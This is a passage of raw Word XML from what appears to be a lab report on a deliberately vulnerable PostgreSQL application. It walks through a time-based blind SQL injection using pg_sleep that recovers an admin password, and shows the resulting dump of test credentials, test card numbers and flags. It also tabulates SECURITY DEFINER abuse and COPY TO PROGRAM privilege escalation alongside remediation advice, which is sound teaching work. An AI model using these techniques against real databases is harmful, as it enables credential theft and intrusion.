          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573BA3BA" wp14:editId="664DDC58">
            <wp:extent cx="3985260" cy="2002849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19979994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99480" name="Picture 199799948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349" cy="20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F6" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="001025F6" w:rsidP="001025F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">And then keep trying for all </w:t>
      </w:r>
      <w:r w:rsidR="00F668BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>remaining</w:t>
      </w:r>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and observe the time in the Network tab</w:t>
      </w:r>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, then the extracted password will be ‘supersecret’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login as Admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRPr="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00880D62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Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRDefault="00B867F6" w:rsidP="00880D62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Password: supersecret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="00880D6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Then you will be redirected to the admin dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="00880D6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371666D" wp14:editId="127F3D71">
            <wp:extent cx="4059555" cy="2048862"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="236787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7171" name="Picture 23678717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289" cy="206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9BD" w:rsidRDefault="008119BD" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRDefault="00B867F6" w:rsidP="001C1C06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>After successful login, the admin dashboard displays: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880D62" w:rsidTr="00AB5D28">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D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Data Exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00E26A17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D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All users and passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D6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admin:supersecret, aya:aya123, maryam:maryam123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00E26A17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D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Credit card data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D6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aya: 4111-1111-1111-1111 (12/25), maryam: 5555-5555-5555-4444 (06/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880D62" w:rsidTr="00E26A17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D6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Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00880D62" w:rsidRPr="007E1FD9" w:rsidRDefault="00880D62" w:rsidP="00880D6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FLAG{postgres_time_based_blind_sqli}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E26A17" w:rsidRDefault="00E26A17" w:rsidP="00B867F6"/>
    <w:p w:rsidR="001025F6" w:rsidRDefault="001025F6" w:rsidP="00B867F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001025F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Extracted flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001025F6" w:rsidRPr="001025F6" w:rsidRDefault="001025F6" w:rsidP="00B867F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99DD141" wp14:editId="109C34B8">
            <wp:extent cx="4142555" cy="847542"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18936592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9205" name="Picture 189365920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03" cy="8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FD9" w:rsidRDefault="007E1FD9" w:rsidP="007E1FD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Or we can use the automated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidRPr="007E1FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>script for extracting the flag in a fast way:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Or we can use the automated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidRPr="007E1FD9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>script for extracting the flag in a fast way:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="00F668BD" w:rsidP="001C1C06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The Python script `</w:t>
      </w:r>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>` automates t</w:t>
      </w:r>
      <w:r w:rsidR="001C1C06">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>he blind SQL injection process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>What it does:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>- Tests each character position (1 to 11) of the admin password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>- For each position, tries every possible character (a-z, A-Z, 0-9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>- Sends a payload with `pg_sleep(2)` that only activates if the character is correct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>- Measures response time: &gt;1.5 seconds = correct character, &lt;1.5 seconds = wrong</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C0AC3" w:rsidRPr="00B031E9" w:rsidRDefault="00F668BD" w:rsidP="001C0AC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>- Builds the password character by character until complete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRDefault="00F668BD" w:rsidP="00F668BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Output: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B031E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The script prints each discovered character and finally displays the full password and flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F668BD" w:rsidRDefault="00F668BD" w:rsidP="007E1FD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="00F668BD" w:rsidP="001C1C06">
      <w:pPr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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68775BE2" wp14:editId="460CDC38">
            <wp:extent cx="3771900" cy="2315930"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1427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994" cy="233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7F6" w:rsidRPr="00E26A17" w:rsidRDefault="00B867F6" w:rsidP="00AB5D28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1C06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lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="007E1FD9" w:rsidRPr="001C1C06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7</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1C06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 xml:space="preserve"> Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9548" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2752"/>
        <w:gridCol w:w="6796"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00AB5D28">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00E26A17">
        <w:trPr>
          <w:trHeight w:val="951"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2752" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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Use Parameterized Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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cur.execute("SELECT password FROM users WHERE username = %s", (username,))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00E26A17">
        <w:trPr>
          <w:trHeight w:val="761"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2752" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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Reject inputs containing SQL metacharacters (', ;, --)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E26A17" w:rsidTr="00E26A17">
        <w:trPr>
          <w:trHeight w:val="703"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2752" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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WAF/Input Filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6796" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E26A17" w:rsidRPr="007E1FD9" w:rsidRDefault="00E26A17" w:rsidP="00E26A1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E1FD9">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Block common SQL injection patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="00E26A17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1C06" w:rsidRDefault="001C1C0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:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidRDefault="001C1C06" w:rsidP="001C1C06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 w:rsidRPr="001C1C06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lastRenderedPageBreak/>
        <w:t>Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867F6" w:rsidRDefault="001C1C06" w:rsidP="001C1C06">
      <w:p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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The following table summarizes the three implemented vulnerabilities, including their type, severity, CVSS score, affected component, and the proof-of-exploitation flag retrieved during successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="1170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340"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="3780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidTr="001C1C06">
        <w:trPr>
          <w:trHeight w:val="908"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Vulnerability Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5" w:themeFill="accent1" w:themeFillShade="BF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Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C1C06" w:rsidRPr="001C1C06" w:rsidTr="001C1C06">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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SECURITY DEFINER Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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PostgreSQL stored function (SECURITY DEFINER)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="378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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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security_definer_abuse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1C1C06" w:rsidRPr="001C1C06" w:rsidTr="001C1C06">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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PostgreSQL COPY TO PROGRAM (CVE-2019-9193)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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PostgreSQL COPY TO PROGRAM functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="378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FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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copy_to_program_success</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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1C1C06" w:rsidRPr="001C1C06" w:rsidTr="001C1C06">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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Time-Based Blind SQL Injection</w:t>
            </w:r>
